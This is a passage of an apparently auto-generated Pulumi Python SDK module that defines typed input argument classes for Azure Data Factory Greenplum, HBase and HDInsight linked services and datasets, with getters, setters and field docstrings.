@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class GreenplumTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Greenplum Database dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'GreenplumTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class HBaseLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
host: Any,
type: pulumi.Input[str],
allow_host_name_cn_mismatch: Optional[Any] = None,
allow_self_signed_server_cert: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
http_path: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
trusted_cert_path: Optional[Any] = None,
username: Optional[Any] = None):
"""
HBase server linked service.
:param pulumi.Input[str] authentication_type: The authentication mechanism to use to connect to the HBase server.
:param Any host: The IP address or host name of the HBase server. (i.e. 192.168.222.160)
:param pulumi.Input[str] type: Type of linked service.
:param Any allow_host_name_cn_mismatch: Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
:param Any allow_self_signed_server_cert: Specifies whether to allow self-signed certificates from the server. The default value is false.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_ssl: Specifies whether the connections to the server are encrypted using SSL. The default value is false.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any http_path: The partial URL corresponding to the HBase server. (i.e. /gateway/sandbox/hbase/version)
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name.
:param Any port: The TCP port that the HBase instance uses to listen for client connections. The default value is 9090.
:param Any trusted_cert_path: The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
:param Any username: The user name used to connect to the HBase instance.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'HBase')
if allow_host_name_cn_mismatch is not None:
pulumi.set(__self__, "allow_host_name_cn_mismatch", allow_host_name_cn_mismatch)
if allow_self_signed_server_cert is not None:
pulumi.set(__self__, "allow_self_signed_server_cert", allow_self_signed_server_cert)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if http_path is not None:
pulumi.set(__self__, "http_path", http_path)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if trusted_cert_path is not None:
pulumi.set(__self__, "trusted_cert_path", trusted_cert_path)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication mechanism to use to connect to the HBase server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
The IP address or host name of the HBase server. (i.e. 192.168.222.160)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="allowHostNameCNMismatch")
def allow_host_name_cn_mismatch(self) -> Optional[Any]:
"""
Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
"""
return pulumi.get(self, "allow_host_name_cn_mismatch")
@allow_host_name_cn_mismatch.setter
def allow_host_name_cn_mismatch(self, value: Optional[Any]):
pulumi.set(self, "allow_host_name_cn_mismatch", value)
@property
@pulumi.getter(name="allowSelfSignedServerCert")
def allow_self_signed_server_cert(self) -> Optional[Any]:
"""
Specifies whether to allow self-signed certificates from the server. The default value is false.
"""
return pulumi.get(self, "allow_self_signed_server_cert")
@allow_self_signed_server_cert.setter
def allow_self_signed_server_cert(self, value: Optional[Any]):
pulumi.set(self, "allow_self_signed_server_cert", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
Specifies whether the connections to the server are encrypted using SSL. The default value is false.
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="httpPath")
def http_path(self) -> Optional[Any]:
"""
The partial URL corresponding to the HBase server. (i.e. /gateway/sandbox/hbase/version)
"""
return pulumi.get(self, "http_path")
@http_path.setter
def http_path(self, value: Optional[Any]):
pulumi.set(self, "http_path", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port that the HBase instance uses to listen for client connections. The default value is 9090.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="trustedCertPath")
def trusted_cert_path(self) -> Optional[Any]:
"""
The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
"""
return pulumi.get(self, "trusted_cert_path")
@trusted_cert_path.setter
def trusted_cert_path(self, value: Optional[Any]):
pulumi.set(self, "trusted_cert_path", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The user name used to connect to the HBase instance.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class HBaseObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
HBase server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'HBaseObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class HDInsightLinkedServiceArgs:
def __init__(__self__, *,
cluster_uri: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
hcatalog_linked_service_name: Optional[pulumi.Input['LinkedServiceReferenceArgs']] = None,
linked_service_name: Optional[pulumi.Input['LinkedServiceReferenceArgs']] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
HDInsight linked service.
:param Any cluster_uri: HDInsight cluster URI. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] hcatalog_linked_service_name: A reference to the Azure SQL linked service that points to the HCatalog database.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: The Azure Storage linked service reference.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: HDInsight cluster password.
:param Any user_name: HDInsight cluster user name. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "cluster_uri", cluster_uri)
pulumi.set(__self__, "type", 'HDInsight')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if hcatalog_linked_service_name is not None:
pulumi.set(__self__, "hcatalog_linked_service_name", hcatalog_linked_service_name)
if linked_service_name is not None:
pulumi.set(__self__, "linked_service_name", linked_service_name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter(name="clusterUri")
def cluster_uri(self) -> Any:
"""
HDInsight cluster URI. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cluster_uri")
@cluster_uri.setter
def cluster_uri(self, value: Any):
pulumi.set(self, "cluster_uri", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="hcatalogLinkedServiceName")
def hcatalog_linked_service_name(self) -> Optional[pulumi.Input['LinkedServiceReferenceArgs']]:
"""
A reference to the Azure SQL linked service that points to the HCatalog database.
"""
return pulumi.get(self, "hcatalog_linked_service_name")
@hcatalog_linked_service_name.setter
def hcatalog_linked_service_name(self, value: Optional[pulumi.Input['LinkedServiceReferenceArgs']]):
pulumi.set(self, "hcatalog_linked_service_name", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> Optional[pulumi.Input['LinkedServiceReferenceArgs']]:
"""
The Azure Storage linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: Optional[pulumi.Input['LinkedServiceReferenceArgs']]):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
HDInsight cluster password.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
HDInsight cluster user name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class HDInsightOnDemandLinkedServiceArgs:
def __init__(__self__, *,
cluster_resource_group: Any,
cluster_size: Any,
host_subscription_id: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
tenant: Any,
time_to_live: Any,
type: pulumi.Input[str],
version: Any,
additional_linked_service_names: Optional[pulumi.Input[Sequence[pulumi.Input['LinkedServiceReferenceArgs']]]] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
cluster_name_prefix: Optional[Any] = None,
cluster_password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
cluster_ssh_password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
cluster_ssh_user_name: Optional[Any] = None,
cluster_type: Optional[Any] = None,
cluster_user_name: Optional[Any] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
core_configuration: Optional[Any] = None,
data_node_size: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
h_base_configuration: Optional[Any] = None,
hcatalog_linked_service_name: Optional[pulumi.Input['LinkedServiceReferenceArgs']] = None,
hdfs_configuration: Optional[Any] = None,
head_node_size: Optional[Any] = None,
hive_configuration: Optional[Any] = None,
map_reduce_configuration: Optional[Any] = None,
oozie_configuration: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
service_principal_id: Optional[Any] = None,
service_principal_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
spark_version: Optional[Any] = None,
storm_configuration: Optional[Any] = None,
yarn_configuration: Optional[Any] = None,
zookeeper_node_size: Optional[Any] = None):
"""
HDInsight ondemand linked service.
:param Any cluster_resource_group: The resource group where the cluster belongs. Type: string (or Expression with resultType string).
:param Any cluster_size: Number of worker/data nodes in the cluster. Suggestion value: 4. Type: string (or Expression with resultType string).
:param Any host_subscription_id: The customer’s subscription to host the cluster. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Azure Storage linked service to be used by the on-demand cluster for storing and processing data.
:param Any tenant: The Tenant id/name to which the service principal belongs. Type: string (or Expression with resultType string).
:param Any time_to_live: The allowed idle time for the on-demand HDInsight cluster. Specifies how long the on-demand HDInsight cluster stays alive after completion of an activity run if there are no other active jobs in the cluster. The minimum value is 5 mins. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param Any version: Version of the HDInsight cluster. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[pulumi.Input['LinkedServiceReferenceArgs']]] additional_linked_service_names: Specifies additional storage accounts for the HDInsight linked service so that the Data Factory service can register them on your behalf.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param Any cluster_name_prefix: The prefix of cluster name, postfix will be distinct with timestamp. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] cluster_password: The password to access the cluster.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] cluster_ssh_password: The password to SSH remotely connect cluster’s node (for Linux).
:param Any cluster_ssh_user_name: The username to SSH remotely connect to cluster’s node (for Linux). Type: string (or Expression with resultType string).
:param Any cluster_type: The cluster type. Type: string (or Expression with resultType string).
:param Any cluster_user_name: The username to access the cluster. Type: string (or Expression with resultType string).
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any core_configuration: Specifies the core configuration parameters (as in core-site.xml) for the HDInsight cluster to be created.
:param Any data_node_size: Specifies the size of the data node for the HDInsight cluster.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any h_base_configuration: Specifies the HBase configuration parameters (hbase-site.xml) for the HDInsight cluster.
:param pulumi.Input['LinkedServiceReferenceArgs'] hcatalog_linked_service_name: The name of Azure SQL linked service that point to the HCatalog database. The on-demand HDInsight cluster is created by using the Azure SQL database as the metastore.
:param Any hdfs_configuration: Specifies the HDFS configuration parameters (hdfs-site.xml) for the HDInsight cluster.
:param Any head_node_size: Specifies the size of the head node for the HDInsight cluster.
:param Any hive_configuration: Specifies the hive configuration parameters (hive-site.xml) for the HDInsight cluster.
:param Any map_reduce_configuration: Specifies the MapReduce configuration parameters (mapred-site.xml) for the HDInsight cluster.
:param Any oozie_configuration: Specifies the Oozie configuration parameters (oozie-site.xml) for the HDInsight cluster.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any service_principal_id: The service principal id for the hostSubscriptionId. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] service_principal_key: The key for the service principal id.
:param Any spark_version: The version of spark if the cluster type is 'spark'. Type: string (or Expression with resultType string).
:param Any storm_configuration: Specifies the Storm configuration parameters (storm-site.xml) for the HDInsight cluster.
:param Any yarn_configuration: Specifies the Yarn configuration parameters (yarn-site.xml) for the HDInsight cluster.
:param Any zookeeper_node_size: Specifies the size of the Zoo Keeper node for the HDInsight cluster.
"""
pulumi.set(__self__, "cluster_resource_group", cluster_resource_group)
pulumi.set(__self__, "cluster_size", cluster_size)
pulumi.set(__self__, "host_subscription_id", host_subscription_id)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "tenant", tenant)
pulumi.set(__self__, "time_to_live", time_to_live)
pulumi.set(__self__, "type", 'HDInsightOnDemand')
pulumi.set(__self__, "version", version)
if additional_linked_service_names is not None:
pulumi.set(__self__, "additional_linked_service_names", additional_linked_service_names)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if cluster_name_prefix is not None:
pulumi.set(__self__, "cluster_name_prefix", cluster_name_prefix)
if cluster_password is not None:
pulumi.set(__self__, "cluster_password", cluster_password)
if cluster_ssh_password is not None:
pulumi.set(__self__, "cluster_ssh_password", cluster_ssh_password)
if cluster_ssh_user_name is not None:
pulumi.set(__self__, "cluster_ssh_user_name", cluster_ssh_user_name)
if cluster_type is not None:
pulumi.set(__self__, "cluster_type", cluster_type)
if cluster_user_name is not None:
pulumi.set(__self__, "cluster_user_name", cluster_user_name)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if core_configuration is not None:
pulumi.set(__self__, "core_configuration", core_configuration)
if data_node_size is not None:
pulumi.set(__self__, "data_node_size", data_node_size)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if h_base_configuration is not None:
pulumi.set(__self__, "h_base_configuration", h_base_configuration)
if hcatalog_linked_service_name is not None:
pulumi.set(__self__, "hcatalog_linked_service_name", hcatalog_linked_service_name)
if hdfs_configuration is not None:
pulumi.set(__self__, "hdfs_configuration", hdfs_configuration)
if head_node_size is not None:
pulumi.set(__self__, "head_node_size", head_node_size)
if hive_configuration is not None:
pulumi.set(__self__, "hive_configuration", hive_configuration)
if map_reduce_configuration is not None:
pulumi.set(__self__, "map_reduce_configuration", map_reduce_configuration)
if oozie_configuration is not None:
pulumi.set(__self__, "oozie_configuration", oozie_configuration)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if service_principal_id is not None:
pulumi.set(__self__, "service_principal_id", service_principal_id)
if service_principal_key is not None:
pulumi.set(__self__, "service_principal_key", service_principal_key)
if spark_version is not None:
pulumi.set(__self__, "spark_version", spark_version)
if storm_configuration is not None:
pulumi.set(__self__, "storm_configuration", storm_configuration)
if yarn_configuration is not None:
pulumi.set(__self__, "yarn_configuration", yarn_configuration)
if zookeeper_node_size is not None:
pulumi.set(__self__, "zookeeper_node_size", zookeeper_node_size)
@property
@pulumi.getter(name="clusterResourceGroup")
def cluster_resource_group(self) -> Any:
"""
The resource group where the cluster belongs. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cluster_resource_group")
@cluster_resource_group.setter
def cluster_resource_group(self, value: Any):
pulumi.set(self, "cluster_resource_group", value)
@property
@pulumi.getter(name="clusterSize")
def cluster_size(self) -> Any:
"""
Number of worker/data nodes in the cluster. Suggestion value: 4. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cluster_size")
@cluster_size.setter
def cluster_size(self, value: Any):
pulumi.set(self, "cluster_size", value)
@property
@pulumi.getter(name="hostSubscriptionId")
def host_subscription_id(self) -> Any:
